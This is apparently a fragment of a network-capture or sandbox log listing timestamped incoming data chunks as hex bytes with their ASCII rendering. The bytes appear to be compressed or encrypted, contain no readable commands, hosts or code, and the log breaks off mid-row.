2022-05-30 12:45:08 UTC	308	IN	Data Raw: 08 33 06 8a 8f cd 94 5a 1c 01 6a e0 54 01 5e 73 b1 cc d1 32 35 56 7a b8 34 74 40 2f d2 25 54 0d 13 cc 12 a7 26 a5 29 2a 3b 26 82 34 ed 69 3b a3 c3 2a 1b 0e cb 45 54 88 5b 03 6d a9 ff 57 db a4 88 a4 b3 9b a3 e3 b2 96 9b b4 7e 7a 51 7c ca d2 b4 6a ff 5c 6c 10 a9 74 dd 73 e5 81 c0 13 17 06 52 ec 7e c6 a6 50 c4 ac 2d 4e 8a 90 1f d3 7a 12 54 0b 22 ae ed 1a 84 8d 5f 0b 2c db cc 13 1a 5c 44 a9 9e 52 38 c5 c1 e3 68 80 7e 79 ec 89 95 30 ff d6 e5 8a 38 a9 dd 8c 47 c6 7a ab 64 57 64 27 bb 28 a8 2c 12 24 8e 9d e4 3c 41 39 68 38 71 ce f1 d6 00 34 3b c8 b6 ae 10 2f 93 80 ea 1a 4a 37 8b a9 76 4f e2 c7 9a c1 cb d0 6a 5e a7 a7 e8 44 c8 3d 64 ce 83 6b 5d c9 d7 0c 49 c1 88 1d 92 87 65 bd 8d 30 92 48 c5 65 4e 16 9f 08 29 f5 7d 25 dc e8 72 4a 55 e7 a6 45 86 ee 75 58 9d 22 a4 Data Ascii: 3ZjT^s25Vz4t@/%T&);&4i;ET[mW~zQ\|j\ltsR~P-NzT"_,\DR8h~y08GzdWd'(,$<A9h8q4;/J7vOj^D=dk]Ie0HeN)}%rJUEuX"
2022-05-30 12:45:08 UTC	309	IN	Data Raw: 86 d3 cf 22 d3 6f bc 25 0e 4a 9c c8 a9 11 45 40 53 a1 17 63 fa 2c ec 5d 92 e8 65 c0 e8 22 c5 61 39 d0 02 be 11 61 6a 57 9a 8b 75 c1 d4 e1 7b 85 19 43 40 48 8c e6 ce 2a d6 59 8d 0e ba 63 fe 33 62 7d 73 e8 d4 bb 66 a2 61 6b fc b8 a8 3c 1e 3f 03 d1 88 86 fb 56 86 ca 9d 09 36 a0 43 ec 2c 0d 32 b6 0f 23 52 9d 5d ca 49 d2 fe 72 35 9c e5 80 9e 1d f0 a5 d9 28 2b 41 6c 46 93 87 af 90 87 fa f8 8a 15 74 6c ce 3e 7f a9 b8 bb 60 4b 3c 5a 08 93 77 38 be 1b 5b c2 f7 04 c3 03 ed 8e bf 47 16 46 60 bd 3b 30 b8 26 df b5 82 73 1e ea bd 49 b3 90 31 3d 3c 16 0a 2e fb 14 97 b8 cf f5 c5 49 7f 24 c9 c3 28 1d 32 ab 66 8c ab 65 f8 31 e0 e1 ea 0b d9 86 06 d4 43 d6 f2 9b 0d d7 f1 ad 46 1c 02 b7 77 b2 ef 6d 5f 89 e0 9a 7c 2c fa a8 dd 7b ea e0 a9 9c 8c 6e 58 b9 46 af 8c 4e c5 77 cc 4f Data Ascii: "o%JE@Sc,]e"a9ajWu{C@H*Yc3b}sfak<?V6C,2#R]Ir5(+AlFtl>`K<Zw8[GF`;0&sI1=<.I$(2fe1CFwm_\|,{nXFNwO
2022-05-30 12:45:08 UTC	310	IN	Data Raw: b5 11 11 33 11 e8 43 ad 36 03 d3 a9 47 2a 7d 1a 1e b4 5c df 2a 59 96 d4 24 3b 91 ed 4c 13 77 63 1e 38 53 d7 94 63 7b d2 91 44 d8 57 e7 6b 69 b7 d6 ab fe 09 e1 0d 6b 55 8a f8 ab d6 0c 0a 79 cf 11 d8 0d 46 6b c8 a4 1e 82 34 de fa ac 5c aa ae 8f 01 dd b2 99 e5 c0 9f 98 42 fa bc ba 60 76 f2 08 7c 21 95 6b b2 ae 70 a9 23 ae 12 5a 0b 75 ea 7b ed da 3b fb 76 df 8f a3 9b 4d 68 35 90 c9 06 83 b6 1d 6c 0c 82 27 3e 59 8d c5 e9 76 3e 40 49 1b 1c 31 f7 86 9a e3 94 26 3c 22 05 34 cf 47 52 66 9f bf 3d d7 cf f5 05 c9 23 e1 8a d1 32 70 0b b2 5f bb 12 39 a5 5e f3 93 aa 19 67 73 5f 9d fd 93 4c 28 51 c0 81 d5 f0 04 d1 9f e5 25 1c f3 b3 93 eb 76 1b 9d cb 7c a4 12 7f 39 b4 86 ab aa 0d 88 70 28 fb 5f bf 4e 05 1b b1 69 c6 c7 30 c1 87 2b a9 a7 5d 37 50 22 e6 3d 9e 76 bc f8 17 f0 Data Ascii: 3C6G}\Y$;Lwc8Sc{DWkikUyFk4\B`v\|!kp#Zu{;vMh5l'>Yv>@I1&<"4GRf=#2p_9^gs_L(Q%v\|9p(_Ni0+]7P"=v
2022-05-30 12:45:08 UTC	312	IN	Data Raw: 6c 73 d9 30 5e 22 1c ab 47 4d 26 b7 68 b7 e6 be 38 64 37 4d 3f d8 f0 c2 45 ad 5d 89 86 ad a6 78 b0 68 49 5e 2a 52 bd df 1b f3 01 ec 49 a2 c1 1d 2c ec 0f 3a 37 36 97 55 c5 77 61 e8 28 0c db ef 99 aa 36 8e 2d 5c f4 4e 89 6a 18 ff ab 1b bc 88 76 c7 96 04 8c 47 2a 80 1f 8c 25 79 77 ed f4 f5 30 a7 cb 5e b8 1e 7c 24 31 e3 fe f8 b5 3a 0a 88 b9 4c 88 12 27 18 c4 c9 af b8 1a 7c 24 0a a8 ab dc 53 dc 64 bf 74 53 da 5a 72 fe f2 b7 df 3d 3e 03 e5 5b 6a 43 a1 1c 3e a4 ac b4 b4 5c b9 20 db d5 eb 2f 4e 38 46 75 3c a9 33 80 b5 b9 e6 64 a4 f2 d7 c7 a6 cc c3 3e 9e 57 09 af da 47 0c 95 a8 5d 10 6b 82 60 de fd a3 61 08 00 ce 7a cc c5 bc 60 88 fc 44 31 de 74 af 72 3d bc 76 c6 10 a3 0f 69 49 f2 b8 08 d7 f2 94 90 1e 72 02 22 c4 53 07 89 87 cf fc 75 c9 92 91 93 89 e2 23 69 cb 37 Data Ascii: ls0^"GM&h8d7M?E]xhI^RI,:76Uwa(6-\NjvG%yw0^\|$1:L'\|$SdtSZr=>[jC>\ /N8Fu<3d>WG]k`az`D1tr=viIr"Su#i7
2022-05-30 12:45:08 UTC	313	IN	Data Raw: b1 53 82 ed 5e 94 95 ed 33 20 e8 48 c0 16 58 03 b7 f8 23 b9 bf b9 0c 33 ac bc 13 56 94 b9 c6 af 34 c0 0e d5 46 10 8b 7b 37 89 e3 67 7f 65 1f a6 cf 56 d2 67 82 56 31 ed 7d 42 40 42 81 d0 83 ea 27 16 6f 16 f1 dc 4b 46 1c cd 98 a5 0f c9 14 66 8e 60 76 35 30 f8 b9 c1 1b 66 2c cb fa ce 62 63 4f cb 74 ab 8e b7 0c b6 1e 69 7c 12 8b f6 77 be 3c bc 7e b7 5b 6c 0b e2 43 c6 d9 9e 8c b3 40 b4 2c 73 e8 54 1d 47 11 d5 cb 22 c2 6c 52 4e a5 03 9f 25 dd 21 c2 18 b2 8f f3 3c 4b 6b 0a 3c f5 cb 9b 76 dc b1 c3 2e 54 bd 1d 82 66 84 15 1f 94 5f ec e3 dd 5d 4a a1 8c 46 45 44 3f d2 12 be b5 c9 f1 47 ba 80 f4 7d 59 22 cc 12 fd a8 d1 79 2e f4 67 3a 3a 50 e4 39 fa c4 c3 f0 a0 62 ed 54 48 bb 96 90 06 47 9f 89 f4 60 63 7c 18 67 ea 60 56 a7 81 95 96 aa 7d 41 97 48 ee 6d 0d d0 8f 22 ef Data Ascii: S^3 HX#3V4F{7geVgV1}B@B'oKFf`v50f,bcOti\|w<~[lC@,sTG"lRN%!<Kk<v.Tf_]JFED?G}Y"y.g::P9bTHG`c\|g`V}AHm"
2022-05-30 12:45:08 UTC	314	IN	Data Raw: 14 65 8b ed 1a f0 da 8c 86 ab f9 57 e2 e0 42 86 d8 29 cf 50 bd 6b 8b 11 db f1 d6 45 57 ba 93 00 77 0c 34 c7 38 dd 33 c8 8a 46 cf 38 67 0d d8 03 96 f5 d8 77 fb 35 9a 28 b7 a8 3f de 0f 8a c4 67 93 8e 8d d8 0d 16 58 ca a7 12 c9 38 ee 63 d8 d0 0d 03 89 54 45 8f 8e 9c 40 34 76 f0 44 f5 14 c3 06 5e 8b 40 78 a6 ee be f9 c7 cb b2 7f a2 6a 0f af 31 51 2c 49 33 05 87 98 63 87 40 16 9a f2 b6 28 0d 11 11 f6 04 77 9f 8b c9 98 71 d6 53 9f 67 17 e4 56 8d d4 60 c5 36 b4 e5 d3 32 05 af 32 03 cd 9a 0a 41 fe 1f b0 79 39 d2 b4 d7 2a 37 54 1d 5a 3b d5 a3 dd e3 43 53 a5 17 62 e5 94 69 3e 5c b4 6a 9d db ef 63 02 62 69 99 9d c5 da 6c 1f e4 88 cb 49 cc 27 bf fd e6 c9 a5 15 b8 b3 2a 89 7e 45 50 a3 53 6f fe 8c e5 06 62 cd d4 84 66 6c 10 6a 15 ce 20 b8 6a fa 82 aa a8 0f f8 a6 0d 76 Data Ascii: eWB)PkEWw483F8gw5(?gX8cTE@4vD^@xj1Q,I3c@(wqSgV`622Ay97TZ;CSbi>\jcbilI'~EPSobflj jv
2022-05-30 12:45:08 UTC	316	IN	Data Raw: 4c cc c4 5a 4b 01 bb e3 cf 4b d4 41 de a7 f8 dd 05 07 76 36 54 ec 11 41 e5 be ed 7f 25 68 15 40 0d 04 0c f7 61 3a 83 b5 85 ff fa 0e 8b 73 4c 0a 21 d3 18 d8 13 f5 7c 9c c8 e0 20 a4 a2 12 52 e7 9a 91 28 4c 15 65 08 7c 24 fd bf 15 12 84 00 06 f0 91 51 e7 e8 bc 76 a0 13 39 27 4c 45 c4 17 ba d5 3c e7 46 f7 20 7e 0c 3b 4a 7f e1 8b a2 d1 c7 a6 31 8e b5 31 da a8 22 ac 43 85 a4 57 53 5a e9 2b 60 ce 74 bd 9c 0c e5 3e 73 11 d7 ea 0a 9e e0 82 01 52 74 47 33 c2 c8 59 fa d4 cf 3c a0 e1 23 9a 44 6f 00 e0 f7 95 75 10 07 4d dd 00 21 ad 36 77 86 19 40 0c 38 f1 d4 dc 59 0b 6e b2 11 03 e1 d3 3b 9f b3 07 87 a4 df 3c 27 d4 1d 18 33 0d cf 1f ae 57 18 8f 11 fc 45 20 b3 75 de f4 2d e9 e9 7d 51 16 51 c9 77 93 1e da 05 44 0d 4b 5f b4 f6 b3 71 79 54 06 de 2c cd ca 8c e7 dc b4 c6 eb Data Ascii: LZKKAv6TA%h@a:sL!\| R(Le\|$Qv9'LE<F ~;J11"CWSZ+`t>sRtG3Y<#DouM!6w@8Yn;<'3WE u-}QQwDK_qyT,
2022-05-30 12:45:08 UTC	317	IN	Data Raw: 09 6c 09 b8 ca ef bf 8b 7a 83 ea f4 39 cf db 09 e6 1c 85 3e 01 6e c4 dc e4 7b 83 09 94 b7 88 cc 78 20 4a 95 64 94 12 55 65 fe 32 0d 32 03 37 a8 47 55 33 e4 ee f9 e5 c4 41 15 b4 14 9f 0c 88 2b 31 d7 ed f7 dc 63 72 84 59 7d 69 5a 70 ca f7 f5 06 cf 9b 78 0d be 0f 29 04 55 5f eb 77 9b 75 1b b5 c4 10 90 7c 12 50 62 43 12 1f 1f c9 cf 76 01 08 3e 13 8f ee af e3 19 21 61 15 aa 34 8a 5d 18 5b 96 e7 9b b9 33 47 27 12 ad 80 32 e5 a9 67 b7 c6 1a cd f0 25 35 ed 9d 95 66 cf 3b f2 79 6e 8d 07 0a fb 4c 3f a8 6b 18 3e 30 df 24 8e 64 fc 17 a5 f6 80 b4 0d 75 d2 30 e7 ff 3c fb 70 e5 88 b9 9e c9 54 88 20 70 f1 4e e3 ac f5 2a d8 4d 0e 0a 1f 50 ba 34 92 dd 26 f1 3f dd 09 c8 b3 0b 25 63 5f e3 3a 5c cf 13 fb f7 8a 1d 40 a6 84 5c ca f5 ef de 94 64 17 35 b1 bd 05 a2 0d 07 02 4e 65 Data Ascii: lz9>n{x JdUe227GU3A+1crY}iZpx)U_wu\|PbCv>!a4][3G'2g%5f;ynL?k>0$du0<pT pN*MP4&?%c_:\@\d5Ne
2022-05-30 12:45:08 UTC	318	IN	Data Raw: d8 5c 19 dd c7 a1 f9 d9 12 54 f7 62 27 0d 89 68 1c 11 e7 3e d9 eb 15 88 9b bb cb 03 42 41 b2 08 03 e4 e8 11 a0 49 d0 4f 06 02 31 e4 37 e2 5f 7b b7 e7 d5 de 69 10 59 75 bf ff 93 7f 18 d1 d6 ff 09 cd f6 88 c5 60 e5 9a 70 d0 ee cb 76 2f a9 41 20 99 bd 59 dd 0f 08 30 8b aa 8d 70 b7 85 00 8c 3a 05 4b 3b 95 4d 82 68 15 97 36 a9 4d 21 72 6e d4 16 1d b7 36 bd bc b2 0e 58 6e b5 33 48 35 c3 b5 e1 d0 74 5b a3 98 a5 4e 1e 31 dc d7 2a 85 87 c3 22 b9 97 6d 9d a9 96 a3 4d 02 b6 d6 74 3f 5f 77 33 b2 36 6e 82 33 d4 d2 8a 0f dd 60 7f fa b8 2c 7d ba 8c 46 54 c8 bf 1c 23 b0 bf 43 0a f3 b0 ca a9 41 4f 03 a1 76 99 bf 9d 90 5e c0 97 0e 7c b9 f4 b0 fb 14 14 2f 8a 2b 2e 26 49 5a 38 15 7f 37 dd b4 d2 05 c6 66 ee ac 38 c3 09 b9 ce fc 1f da ee 58 7c 99 71 2c a2 ce 61 0e f9 0b c3 82 Data Ascii: \Tb'h>BAIO17_{iYu`pv/A Y0p:K;Mh6M!rn6Xn3H5t[N1*"mMt?_w36n3`,}FT#CAOv^\|/+.&IZ87f8X\|q,a
2022-05-30 12:45:08 UTC	319	IN	Data Raw: 08 e9 9a 1f c3 20 46 b4 47 9f 77 ff 79 40 43 5e 49 b5 c3 b8 11 b0 89 56 60 85 bd 14 d0 b0 27 24 07 ac 4a 24 53 e6 93 b9 5e 26 91 b3 fc 67 37 80 50 c3 1c 76 2a 27 83 a5 df e3 28 78 e9 09 98 d1 c3 bb 8e 34 a7 85 79 de ec 29 7d 98 17 44 a0 94 c3 87 b8 04 41 ef c0 2b db 06 c6 f9 0c 9a a6 05 c9 ef 60 96 f8 29 ef 9d 77 e8 2d d6 c9 fc 07 6f 63 76 99 88 12 6b 5c 86 35 5b 4e d2 c0 ea 42 60 4c 6f 45 35 19 8b e6 59 6b 3f 15 08 30 6b 80 f2 57 6c 48 f1 35 97 64 0e 65 1f c5 4c a0 7c e5 ea 51 97 2d 0c 1a d0 81 b4 8e ea 0c 5c f0 32 45 f2 96 8d 39 fa cf 4a bd 81 91 f1 5a 04 8b 53 47 09 02 5d 90 d2 83 83 74 97 fa c7 cb a5 51 ae aa 88 91 fe cf bf 48 28 53 e7 2c e2 03 cc 0f 6a cf b3 07 e6 7b 7d f8 0f 55 10 4f 38 d8 df 54 d5 24 fd 39 07 c2 5d 65 99 e1 94 4d a2 6e 18 81 05 f1 Data Ascii: FGwy@C^IV`'$J$S^&g7Pv*'(x4y)}DA+`)w-ocvk\5[NB`LoE5Yk?0kWlH5deL\|Q-\2E9JZSG]tQH(S,j{}UO8T$9]eMn
2022-05-30 12:45:08 UTC	321	IN	Data Raw: 2c a1 66 62 6b f1 71 b2 d0 d7 2e 23 54 aa 35 10 80 65 79 a0 9f f8 54 5f ba 58 65 8a 85 5a e3 64 32 98 41 ee b6 ae eb e0 46 9f 4b e3 3d 99 ea 00 28 3a d1 d2 74 04 33 8b 4f 35 fe 33 a0 8d b6 37 a7 67 47 fe 2f 12 3e 93 57 be af 77 4f 78 18 4d 8d 3c d5 6e 7a 10 57 2d 32 c2 49 90 8c 0b 9f 8f bc 77 da 7f e7 12 a3 c6 a6 6b a4 15 30 58 82 bc 14 8c 45 fa 49 6f ef 22 f5 13 36 7f 3a 3f c0 d4 6e db 64 0d aa be 6f 88 16 8c c9 66 1b 52 58 39 3b 29 b8 23 16 e7 d6 f7 37 74 61 24 8b 24 e4 d1 64 c1 9f 93 8a 08 10 4c 6c c2 7f 78 9d 30 22 17 81 28 f4 3d 8c 53 6b 35 8c 06 bf 7f e7 22 57 6b c1 a9 77 0d ea 1e 0e d1 0e e4 d0 fa c7 97 74 04 3f fa 0e 8b 99 c1 45 fc 51 23 ef 9e 15 36 68 5a 50 0d fa 87 07 eb a1 9a 42 38 f6 9c 90 1f 3a 8a b8 4b 5c c0 31 46 06 2a 30 a1 3c b2 f0 02 1a Data Ascii: ,fbkq.#T5eyT_XeZd2AFK=(:t3O537gG/>WwOxM<nzW-2Iwk0XEIo"6:?ndofRX9;)#7ta$$dLlx0"(=Sk5"Wkwt?EQ#6hZPB8:K\1F*0<
2022-05-30 12:45:08 UTC	321	IN	Data Raw: 3c 1f 31 c2 af b5 cd 78 55 0a 49 3c c8 3c 5e 52 b8 3e b8 75 74 17 4a 01 53 36 02 c1 8c 79 1e 2f 4e d4 d4 be b2 5c 84 14 4b 17 02 f5 56 f6 5c f8 49 c6 8e 7a 3b c2 2f c2 3c 6f ea 63 8a 23 30 07 10 90 73 12 05 52 97 eb 2c df 90 5e 61 cd 91 34 bf 8c b6 9c 2e 07 44 6a f3 af 34 fe bb b5 59 c0 08 a0 cd 33 fa 47 db 2e 6c 73 e7 ff 26 9b 78 60 18 73 c3 73 42 b6 a7 26 d9 cd 3e ec fb 01 e8 9f c7 5b 77 50 14 6c 60 8e 39 d3 67 74 88 1f 96 bd ca 12 dc 9d 85 cb 1a 72 66 01 67 84 bc 62 1b 6f 5e d3 ef 67 79 b0 ec 39 c0 aa 50 df a6 6e e0 af 3f 34 d8 45 c3 fd bb 4d 8a 6d 23 9b d2 74 24 8e 38 02 83 d3 7f 54 cc e2 4c a6 94 7f 82 34 37 19 6b 9f 2c eb ca 0f 38 a0 05 07 31 f3 f4 ab 69 c7 9e 88 12 44 a1 64 ce b0 73 32 03 72 8b 38 68 b3 87 f7 fe 8d 72 79 b2 29 89 2b a4 d7 3c 29 8e Data Ascii: <1xUI<<^R>utJS6y/N\KV\Iz;/<oc#0sR,^a4.Dj4Y3G.ls&x`ssB&>[wPl`9gtrfgbo^gy9Pn?4EMm#t$8TL47k,81iDds2r8hry)+<)
2022-05-30 12:45:08 UTC	323	IN	Data Raw: 17 ee 41 c5 aa cb c9 f3 4d f3 0d 64 36 50 2a 1b 4a c0 df cb 64 87 54 fa 10 da 43 20 a2 06 2a 82 bd 77 fd a3 96 16 fd 04 6f 00 74 42 0f cd 7c 68 15 7f 39 67 e2 e9 0b 1a 52 aa 02 c0 6e 9f 3a 7f b2 48 86 39 89 e9 86 ec df d9 d1 27 1e 68 a8 11 9f 3e d1 21 1f 9c 6d 8b 57 4a ee a3 98 f0 28 1a bd 51 06 a2 98 6d db ff 32 1d fc fa f2 f4 c3 88 b9 82 6f 4d 89 eb b0 92 f0 90 58 38 83 db 48 6c fe f8 99 7f b6 3c a9 8d ed 60 77 96 ab 59 20 e8 f6 18 31 aa be 79 75 0e 81 34 e9 b2 76 e0 c0 0d b6 17 a6 3c 7b e9 c3 ec 2a b9 c4 95 ff 1e bc e9 e6 70 ea 98 3b e3 21 5a 9c ea 97 5b 12 80 c8 22 ce 47 4c f7 9b e8 a1 1d a1 7e 6a 8e d3 c3 6a e3 9b ff 61 fd 66 d0 5e 0a 4d 87 7c b9 ba 96 b0 50 cb 6f 86 96 90 b7 f5 2c a2 1f c1 6e 8d 1e 01 bf 22 2d 49 3b b9 46 d8 81 c2 aa c3 01 3c 3f 6e Data Ascii: AMd6PJdTC wotB\|h9gRn:H9'h>!mWJ(Qm2oMX8Hl<`wY 1yu4v<{*p;!Z["GL~jjaf^M\|Po,n"-I;F<?n
2022-05-30 12:45:08 UTC	324	IN	Data Raw: d8 81 87 03 4c 16 11 dd 5d a0 63 23 ba f9 02 7b 27 72 2d 20 f7 85 d0 54 eb 59 9e 93 e3 7a f9 7d 10 f0 99 f7 ff f9 d6 62 8f 22 6c 7b 7f 10 b3 74 c4 c3 c7 04 85 2c 50 c3 2b 57 48 16 91 11 e9 1f 96 7e bd e7 e2 bf 28 84 e1 ad 36 03 01 9f eb 81 d1 8f 96 51 f6 f3 91 a6 59 b9 d9 dc bc 62 4d 13 7e ae d4 b5 b3 88 e1 c2 8c 4c 2f 1d d5 19 e9 54 c4 c3 c5 70 3e 84 b2 23 11 63 ac ac 70 47 4d 36 89 fb d4 4b 7c 45 89 8b 28 33 7b b7 28 81 ab f9 f7 22 a8 39 bd 2b 93 98 49 10 64 ff 1e db a4 5e d4 ce 08 0e e8 e6 78 cc c7 31 a6 a7 bd b6 56 bb b8 d6 c5 c4 c5 3b 07 a5 77 71 83 a0 65 7b dd f3 c0 72 8c b2 1d 4c 0f 82 27 04 f2 e7 7d 67 9b 4c 05 a4 2d 62 59 77 2a 99 e3 ea b7 b3 b7 a5 c2 61 ef ea 87 6e 20 3e ad f0 d3 5c 00 86 a2 35 c7 cd b6 1b 80 cc dd 07 c6 ff 3d fa 3c aa 6f b0 3e Data Ascii: L]c#{'r- TYz}b"l{t,P+WH~(6QYbM~L/Tp>#cpGM6K\|E(3{("9+Id^x1V;wqe{rL'}gL-bYw*an >\5=<o>
2022-05-30 12:45:08 UTC	325	IN	Data Raw: b5 06 8a 84 26 e0 2c e2 7b ca ed 61 4b a1 8c b2 5b a7 c3 7c eb c1 ab 34 8a 3d d9 28 8a 43 db e0 cc 54 27 04 15 9d 57 56 a7 c5 cb ef 1a bb 5f 3d d5 e4 dd 65 61 aa 83 3e d5 ea c9 e9 9f 05 5b 0d 83 95 e7 98 58 5c e0 a7 a4 74 92 39 8b bc 68 c1 e0 56 ca 6c 10 db 7a 38 8d 70 46 ce 1d 52 5e 25 66 79 1c b3 44 52 fe 26 bd 09 54 0f 62 7a 2b e0 32 d1 01 38 e8 95 3e 4c 9e 2d 08 81 c8 c4 a3 bb 56 81 ae d8 12 7f 66 d4 f6 8e ad 45 1c 6b e9 92 a9 33 75 c7 2f 80 a7 f4 c5 80 7f e9 d2 54 89 12 80 76 39 16 5c 9b 32 f3 74 a5 29 e3 0e 80 ce 05 f1 00 86 4c 40 2e 50 ef d0 4a 63 09 6f f0 24 64 62 52 d0 61 11 a9 3e 4b 8c 54 aa 09 d3 52 d2 41 a7 97 6a 03 c0 20 4c e3 79 4b b7 02 66 35 0a a9 43 77 86 ed a5 24 ec fb da 0d df 81 fd ce 42 03 5d da 5d 2a b3 e4 ce 00 1a 06 21 fe a1 5d 30 Data Ascii: &,{aK[\|4=(CT'WV_=ea>[X\t9hVlz8pFR^%fyDR&Tbz+28>L-VfEk3u/Tv9\2t)L@.PJco$dbRa>KTRAj LyKf5Cw$B]]*!]0
2022-05-30 12:45:08 UTC	326	IN	Data Raw: 04 4c ab 1d 9c 0a dd 58 a2 f2 e4 5c d3 1c c0 2e d5 63 75 cb 65 dc a3 9a 0d 21 46 28 56 37 69 06 5f 11 25 cd c7 35 aa d9 f4 be 09 48 4a 01 bb b8 97 fe 9e aa 30 f2 15 5f e6 55 b4 c7 9b e9 76 31 09 c4 17 95 62 19 63 9e 10 36 33 20 b8 4d 6c 50 ab 34 fa 10 49 27 34 e9 a2 74 23 87 fc 2a 3c b9 c1 94 57 1e 06 14 af 56 39 fd c4 0a ae 63 b9 6e 98 3d cf df a5 09 6a bf 82 16 f6 6a de 91 05 f9 8b 76 b4 9c e3 b5 f7 89 c4 7d ef b7 1a 24 75 14 b2 96 b5 47 92 7f d7 05 bf fb 91 3b 9f 4f bd bb 96 91 c6 f4 35 a5 25 b6 1f 6c 22 05 06 af ed b8 f7 70 c4 42 6a 98 8f b8 3e 33 ba c0 6c 3d f9 ac bc d4 c0 76 71 21 f5 76 d3 c2 be 31 94 6c 82 ce 5b fc 4d a0 f4 03 35 64 87 b3 85 d5 c2 1c 77 ac a1 21 f1 77 23 c4 e8 07 34 22 ed f9 a9 46 96 db 0f 97 74 91 2c 86 73 59 71 5a 89 7d 14 9a 24 Data Ascii: LX\.cue!F(V7i_%5HJ0_Uv1bc63 MlP4I'4t#*<WV9cn=jjv}$uG;O5%l"pBj>3l=vq!v1l[M5dw!w#4"Ft,sYqZ}$
2022-05-30 12:45:08 UTC	328	IN	Data Raw: 64 03 cc 27 00 8a 62 bd 46 82 af e2 ad ad 15 ed dc 69 c2 2f 9e 5a 6e 24 d3 39 9f 30 00 99 ac 1e b7 63 c0 dc d5 74 7a 1f 3c 44 fe 6a cd b5 79 ce ab 4f 8c 97 33 be 63 8a ec 6b b3 b9 ec 8a 87 ef d0 34 c7 c9 6b d5 22 08 88 b8 79 54 c6 5f 58 f3 b4 29 5f 57 c5 52 29 b8 c2 2a 9c 44 97 dd 74 97 82 00 31 04 df 5a 75 ec cf 2f 52 a9 44 cc 95 c5 5d 87 f7 4a f8 e2 02 87 18 59 a2 a7 1a 26 7e d6 d3 78 eb 0c 82 53 ac 9a 19 6e 2e 6f 31 1a ad 2d e8 fb 79 7d ee dd 96 06 01 f3 fd 32 f5 d9 8a 81 ef c5 c2 9a 49 80 8c 8c 6d 91 34 c7 5b 32 49 f7 0c 66 7f f5 24 5f f3 9a bc 76 cc 64 87 e8 02 86 b7 b2 9d 5d 7c ea 7a bc 77 d3 20 a7 56 76 d8 63 bd 9e e0 a3 b8 06 81 66 8b 4d 25 8e 0c f5 3b a8 6d 83 17 6d 18 3a fe 9b b0 b1 80 c7 e0 f2 67 1f 23 a7 b7 0e d2 12 ee 99 36 21 d0 c0 e9 0f 58 Data Ascii: d'bFi/Zn$90ctz<DjyO3ck4k"yT_X)_WR)*Dt1Zu/RD]JY&~xSn.o1-y}2Im4[2If$_vd]\|zw VvcfM%;mm:g#6!X
2022-05-30 12:45:08 UTC	329	IN	Data Raw: 8f b2 4d f3 e4 1c fc 63 b2 fe ab 96 3c 6b f9 dc 92 9b 43 7c 70 78 fa cb f4 80 3c 60 b1 8b 6d 45 89 bd e8 ef b3 46 61 92 75 58 e5 93 5a 8b 36 ae ec a5 9f 07 4c 9e ae 4f 28 61 fa 29 03 dd a0 a6 b0 e4 5c d2 94 fc f2 97 cf e8 17 99 0a 41 c3 09 5d 62 fb ec 10 b1 3a ef b9 11 74 f4 0d 9c a6 a1 fd 93 d1 7d 85 b2 a1 b4 2e ab 54 bb bc 06 db 20 90 40 87 d2 ef d0 3c 86 30 d2 8f 8b 09 80 f7 58 ad 64 5e d9 4b 85 95 65 08 d3 c5 47 b4 fd 60 d9 e8 e0 7f 37 a1 ca 8b 40 a4 bc 93 1e 06 80 67 43 eb 54 05 11 45 10 1d 4b 9c 86 c7 90 33 29 57 aa 2a f1 4e 4c 59 c9 07 87 8a 6f 58 1c b6 1d 0a 38 28 12 7f 9f 55 91 e0 63 ec 3d 34 f9 47 82 60 e6 cf c5 59 c5 93 ad bb e6 9f bb 54 00 2c 24 d9 fd 01 38 22 a2 bb 71 0c 81 a6 b5 34 4b 9c 77 50 31 fd 66 88 df 2e 1a 30 2e fa 1f d6 9a 7f 67 da Data Ascii: Mc<kC\|px<`mEFauXZ6LO(a)\A]b:t}.T @<0Xd^KeG`7@gCTEK3)W*NLYoX8(Uc=4G`YT,$8"q4KwP1f.0.g
2022-05-30 12:45:08 UTC	330	IN	Data Raw: a7 b0 2f d5 a3 62 3f 32 54 bd a6 2f 03 44 41 04 3a a2 0d ce 1b 89 b6 a8 43 1a 6b cc 32 b0 f2 d8 53 12 d5 b0 8b c2 8a f2 f1 ea e6 72 61 ea 64 ef ab a0 6e 68 32 c6 ea f4 62 da 37 38 b1 f7 a8 93 2b 1d 3e 79 e0 57 b9 e3 22 3e 98 78 ed fa e8 8b 96 89 b6 fc 02 fe 09 1a 49 2e 0d fc 47 15 6f 32 42 34 52 d9 34 a3 3f 1f ea bf e6 2f ed 86 b0 42 8a 80 c2 aa 46 ca f2 9f e2 92 dd e6 27 2c 9e eb 13 0d 8a 81 5d 50 38 9e 62 c2 d3 52 b2 2c 7e 26 29 60 b1 43 e6 90 07 07 c7 4b 61 f2 3e 8f 86 12 08 24 68 95 0f d4 63 11 06 8a d7 fd 2d e2 eb 73 91 2d 59 3e ae 84 67 bf 5b a7 21 f8 c2 ab 34 58 b3 b5 89 fc c9 b8 eb a9 f2 2f c3 22 d1 64 b6 23 46 98 19 ec c2 7c 6d 77 e7 0d 75 66 24 32 48 96 1a f1 9c 90 0d 72 ab da 97 f0 02 4e c6 2c 3e ff 0d 4e 2c 08 bf 98 e6 30 86 6b cd b4 dd 1a c5 Data Ascii: /b?2T/DA:Ck2Sradnh2b78+>yW">xI.Go2B4R4?/BF',]P8bR,~&)`CKa>$hc-s-Y>g[!4X/"d#F\|mwuf$2HrN,>N,0k
2022-05-30 12:45:08 UTC	332	IN	Data Raw: 0d 4b 5c 0c a7 da 22 64 ab f9 2b 7f 17 1a 71 2b 4d 4a b3 17 64 75 19 1d b8 9c 7c 62 7c 96 a8 5c c2 33 cb bd 55 a6 6e c6 46 44 26 aa 0a 6d 53 2e ef ca e7 fa 21 a0 65 19 1f 6c f6 dd 9b a3 60 ee 0c f6 28 0d 9c 2b 3a 97 ed bc 65 04 b8 62 2f 87 7e 32 4f ea f2 e2 70 40 34 1b d0 cf 05 14 55 82 10 4a 80 5c 00 d3 d6 34 c7 17 99 07 39 41 3a 1c 83 d1 56 3f 3c 12 e6 32 cd 90 17 03 6d 80 78 1f 04 a6 71 51 70 6d 9b a3 6e ec 23 d8 7f 68 9a 61 8b 11 72 a5 e5 b3 30 8e 0c bb 9c ad b8 2d a2 21 a2 c4 79 73 5b 40 5a 0c 4e 35 62 ec f3 cd db 5b 4d e5 5b 06 81 af d0 aa 9c 17 19 f3 a8 b5 11 22 37 95 be 75 d0 f4 b4 a2 98 e9 86 bc f5 cc f4 bd c5 f5 c3 03 ec 28 6d 95 a9 3e 97 e6 74 6f 46 77 8f 0e 4e 9c 89 ab 6e f6 3b eb 59 49 cc ae 17 5a fd 33 20 d2 1f 57 03 44 41 f2 10 30 88 35 e9 Data 